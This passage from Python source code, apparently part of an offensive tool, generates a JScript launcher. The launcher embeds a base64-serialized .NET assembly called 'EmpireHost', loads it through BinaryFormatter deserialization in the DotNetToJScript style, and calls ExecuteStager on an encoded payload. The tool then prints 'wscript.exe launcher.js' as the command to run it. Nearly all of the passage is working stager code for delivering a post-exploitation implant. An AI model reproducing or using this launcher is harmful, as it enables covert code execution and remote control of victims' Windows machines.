            code +="\"HRJRCBJRBAAAEk0GIAEBEoEBCAACEkkScRJNBAABARwEAAASRQUgAQESSQUgAQESUQggABUSXQES\"+""\n"
            code +="\"YQMHARwEAAECDgUgARJFDgQgABJRBSAAEoERBxUSXQESgRUFIAETAAgJIAIBEYEZEYEZCyABFRJd\"+""\n"
            code +="\"ARJhEoEdEgcGHBJZHBUSXQESYRUSZQEcDgUgABKBIQogBAESVQ4RgSUcBRUSZQEcBSABARMABhUS\"+""\n"
            code +="\"XQESYQMgAAgDIAAcBSAAEoCBBSACDggIBAcBEmkFBwIcElUFIAASgSkFIAARgS0DIAAOBQAAEoEx\"+""\n"
            code +="\"BCAAEn0HIAQBCAgICAQAABF5IAcGFRKAlQIOEmEVEoCdARKAmRKAmR0ODhUSgJUCDhJhBwAEDg4O\"+""\n"
            code +="\"Dg4KIAMBEYC5EYC5DggVEoCVAg4SYQcVEl0BEoCZCSAAFRKAnQETAAgVEoCdARKAmQQgABMAAwAA\"+""\n"
            code +="\"DgUAARJhHAcgAgETABMBAyAAAg8HBRQOAgACAAASgI0IDggEAAASfQcUDgIAAgAACQADDhKBRQ4d\"+""\n"
            code +="\"HAYgARKAjQ4HFRJdARKAoQUgAQ4SfQUAAgIODgUAAg4ODiMHDBQOAgACAAASgI0VEl0BCBUSXQEI\"+""\n"
            code +="\"CAgVEoCdAQgICA4OCAUVEl0BCAYVEoClAQgGFRKAnQEICyADEoCNEoFFDh0cByACEoCNCAgEBwES\"+""\n"
            code +="\"KAcgAgEOEoC1BAABAQ4FBwERgLkFAAARgLkGAAEBEYC5AwAAAQcHAx0OHQ4DAgYOBiABHQ4dAwQg\"+""\n"
            code +="\"AQMIDAcDFA4CAAIAAAgdDgUgAgEICAYgAwEICA4EIAEBHAogABUSgVEBEoFVBSACAQ4cCBUSgVEB\"+""\n"
            code +="\"EoFVFQcKFRKAxQESUQ4ODg4SYRJRHQ4IDgcVEoDFARJRBSABElEOBiACElEOHAYgAhJRDgIFIAAd\"+""\n"
            code +="\"EwAEBwIODgYAAQ4RgWkGAAMODg4OCgcEDhKAyRKAzQ4EBhKAzQYgARKAzQ4EIAEcDgUAABKAyQQA\"+""\n"
            code +="\"AQ4OCAABEoF1EYF5CAABEoDJEoF1AwAACAUAAgEICAQAAQEIAwAAAgIGGAUAABKBgQUgABKAhQ4H\"+""\n"
            code +="\"BxKAtRKAtQ4IAwMSKAQKARIoBCABAQMECgESLBMHDRJUETgYGAgYCBgIAhFQCB4ABgABGBKAtQUA\"+""\n"
            code +="\"AgIYGAQAARgIBQACGBgIAh4ABAABARgLBwYSVBgYAhFQHgAFIAIBDg4GAAMBGAgGBAABDhgEBwES\"+""\n"
            code +="\"TAQgAB0DERABARUSgMUBHgAVEoClAR4AAwoBAwYVEoGZAQMFIAIBHBgGFRKAxQEDCiABARUSgZkB\"+""\n"
            code +="\"EwAPBwcSgI0SgI0SgI0ICAgICwcICAgIGBgYCBIsBwcDEoC1CAMFAAIGGAgGBwISgLUIBgABCBKB\"+""\n"
            code +="\"dQi3elxWGTTgiQgxvzhWrTZONTpTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABc\"+""\n"
            code +="\"AFAAbwB3AGUAcgBTAGgAZQBsAGwAIFAAbwB3AGUAcgBTAGgAZQBsAGwARQBuAGcAaQBuAGUAHkEA\"+""\n"
            code +="\"cABwAGwAaQBjAGEAdABpAG8AbgBCAGEAcwBlAAIxAAQBAAAABAIAAAAEEAAAAAQgAAAABAABAAAE\"+""\n"
            code +="\"AAIAAAQAEAAABAAAABAEBAAAAAQIAAAABEAAAAAEgAAAAAQABAAABAAIAAAEAEAAAAQAAAIABAAA\"+""\n"
            code +="\"BAAEAAAIAAQAABAABP9/AAAEAQIAAAQAAAAABMcEAAAEVwAAAATsAwAAARUDBhIMAgYCAgYIAwYS\"+""\n"
            code +="\"EAMGEkkDBhJFAgYcAwYReQMGEn0DBhIUAwYSHAQGEoC1AwYROAMGETwDBhFQBCABAg4FIAEBElUG\"+""\n"
            code +="\"IAIBHBJtBSABARIMBCAAEXkEIAASSRIACQgQETQIEAkYCRAYEAkQAggVAAkCCBgJEoCNEAgSgI0Q\"+""\n"
            code +="\"CBKAjRAIBSAAEoCREyADFRKAlQIOEmEODhUSXQESgJkNIAQIDg4VEl0BEoChCBYgBBUSXQEIDg4V\"+""\n"
            code +="\"El0BEoChFRKApQEICSAEEoCpDg4ODg8gBhKAqQ4ODg4RgK0RgLEFIAASgLUHIAIBChKAvQUAAR0O\"+""\n"
            code +="\"DhAAARQOAgACAAAVEl0BEoChCAAEEmEODg4OBgABHRJRDgcAAh0SUQ4CBQACDg4CBgADDg4CAgUg\"+""\n"
            code +="\"ABGAuQYgAQERgLkFIAARgNUGIAEBEYDVBSAAEYDZBiABARGA2Q4gARQRgN0CAAIAABGA4QggARGA\"+""\n"
            code +="\"5RGA6Q8gBAERgOERgNkRgOERgN0PIAIBEYDZFBGA3QIAAgAACSACARGA4RGA3QYAAhIoDg4HAAMS\"+""\n"
            code +="\"KA4OGAgABBIoDg4ODgkABRIoDg4YDg4GAAISLA4OBwADEiwODhgMAAQSLA4OEoC1EoC1DQAFEiwO\"+""\n"
            code +="\"DhgSgLUSgLUIAAMSKBJADg4MAAMSLBJAEoC1EoC1DRABAx4AEkASgLUSgLUHAAMSKA4ODggABBIo\"+""\n"
            code +="\"Dg4OGAkABRIoDg4ODg4KAAYSKA4ODhgODgYAARIoEkQIAAMSKBJEDg4HAAMSLA4ODggABBIsDg4O\"+""\n"
            code +="\"GA0ABRIsDg4OEoC1EoC1DgAGEiwODg4YEoC1EoC1BgABEiwSRAwAAxIsEkQSgLUSgLUNEAEDHgAS\"+""\n"
            code +="\"RBKAtRKAtQYgAQESgLUGAAESgLUOAyAAGAQgAQEYBCAAETgFIAEBETgEIAARPAUgAQERPAYgAwEO\"+""\n"
            code +="\"Dg4RAAoRUBJUDhgIGAgYCBACETwTAAkRUBJUCBAIGAgQGBAIEAIROAkABQIIDg4YEAgJAAUCCBgY\"+""\n"
            code +="\"GBAIFQAJAggYCBKAjRAIEoCNEAgSgI0QCA8ACQIIGAgYEAgYEAgYEAgHAAMSKAIYCAcAAxIsAhgI\"+""\n"
            code +="\"BgABEoC1GAcAAhKAtRgIAygAAgMoAAgEKAASfQQoABF5AygADgUoABKAgQUoABKAhQQoABJJBSgA\"+""\n"
            code +="\"EoCRBSgAEYC5BSgAEYDVBSgAEYDZBSgAEoC1AygAGAQoABE4BCgAETwIAQAIAAAAAAAeAQABAFQC\"+""\n"
            code +="\"FldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAADwEACkVtcGlyZUhvc3QAAAUBAAAAABcB\"+""\n"
            code +="\"ABJDb3B5cmlnaHQgwqkgIDIwMTcAACkBACQyZWI5ZGQxMC1iNGY5LTQ2NDctYjFjMy0yNWMwOTky\"+""\n"
            code +="\"OTc5MDUAAAwBAAcxLjAuMC4wAAAFAQABAAAAAAAAAAAAIvEzWQAAAAACAAAAHAEAAFiQAABYcgAA\"+""\n"
            code +="\"UlNEU9NhchFbyoVAkiWQmGgji+sBAAAAQzpcRGV2ZWxvcG1lbnRcRW1waXJlSG9zdFxFbXBpcmVI\"+""\n"
            code +="\"b3N0XG9ialxSZWxlYXNlXEVtcGlyZUhvc3QucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACc\"+""\n"
            code +="\"kQAAAAAAAAAAAAC2kQAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqJEAAAAAAAAAAAAAAABfQ29y\"+""\n"
            code +="\"RGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFigAAAsAwAAAAAAAAAAAAAs\"+""\n"
            code +="\"AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAA\"+""\n"
            code +="\"AQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBu\"+""\n"
            code +="\"AGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEjAIAAAEAUwB0AHIA\"+""\n"
            code +="\"aQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAaAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBv\"+""\n"
            code +="\"AG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAD4A\"+""\n"
            code +="\"CwABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABFAG0AcABpAHIAZQBIAG8AcwB0\"+""\n"
            code +="\"AAAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA+AA8A\"+""\n"
            code +="\"AQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEUAbQBwAGkAcgBlAEgAbwBzAHQALgBkAGwAbAAA\"+""\n"
            code +="\"AAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQA\"+""\n"
            code +="\"IACpACAAIAAyADAAMQA3AAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAA\"+""\n"
            code +="\"AAAAAABGAA8AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAARQBtAHAAaQByAGUA\"+""\n"
            code +="\"SABvAHMAdAAuAGQAbABsAAAAAAA2AAsAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEUAbQBw\"+""\n"
            code +="\"AGkAcgBlAEgAbwBzAHQAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEA\"+""\n"
            code +="\"LgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAu\"+""\n"
            code +="\"ADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkAAADAAAAMgxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3Rl\"+""\n"
            code +="\"bS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA\";""\n"
            code +="var entry_class = 'EmpireHost';""\n"
            code +="\n"
            code +="try {""\n"
            code +="	setversion();""\n"
            code +="	var stm = base64ToStream(serialized_obj);""\n"
            code +="	var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');""\n"
            code +="	var al = new ActiveXObject('System.Collections.ArrayList');""\n"
            code +="	var n = fmt.SurrogateSelector;""\n"
            code +="	var d = fmt.Deserialize_2(stm);""\n"
            code +="	al.Add(n);""\n"
            code +="	var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);""\n"
            code +="		o.ExecuteStager(EncodedPayload);""\n"
            code +="\n"
            code +="} catch (e) {""\n"
            code +="    debug(e.message);""\n"
            code +="}\n"
            command = """\n[+] wscript.exe launcher.js """                       
            print colored(command, 'green', attrs=['bold'])
	return code